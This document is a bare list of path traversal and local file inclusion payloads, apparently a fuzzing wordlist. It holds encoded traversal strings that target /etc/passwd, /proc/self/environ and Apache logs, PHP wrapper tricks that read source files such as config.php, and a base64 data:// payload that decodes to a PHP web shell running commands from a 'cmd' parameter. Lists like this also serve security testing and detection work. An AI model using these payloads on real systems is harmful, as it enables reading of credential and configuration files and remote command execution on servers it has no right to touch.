../../../../../../../../etc/passwd
..%2F..%2F..%2F..%2Fetc%2Fpasswd
....//....//....//etc/passwd
..\/..\/..\/..\/etc\/passwd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%e0%80%af..%e0%80%afetc%e0%80%afpasswd
..%uff0e%uff0e%2f..%uff0e%uff0e%2fetc%2fpasswd
..%c1%1c..%c1%1c..%c1%1c/etc/passwd
..%c0%ae%2e%2f..%c0%ae%2e%2fetc/passwd
..%c0%ae%c0%ae%2f..%c0%ae%c0%ae%2fetc/passwd
/./././././././etc/passwd
../../../../../../../../proc/self/environ
../../../../../../../../proc/version
../../../../../../../../var/log/apache2/access.log
../../../../../../../../var/log/httpd/access_log
php://filter/read=convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=config.php
php://input
php://temp
php://fd
php://memory
expect://ls
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
zip://var/www/html/config.zip#config.php
input=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
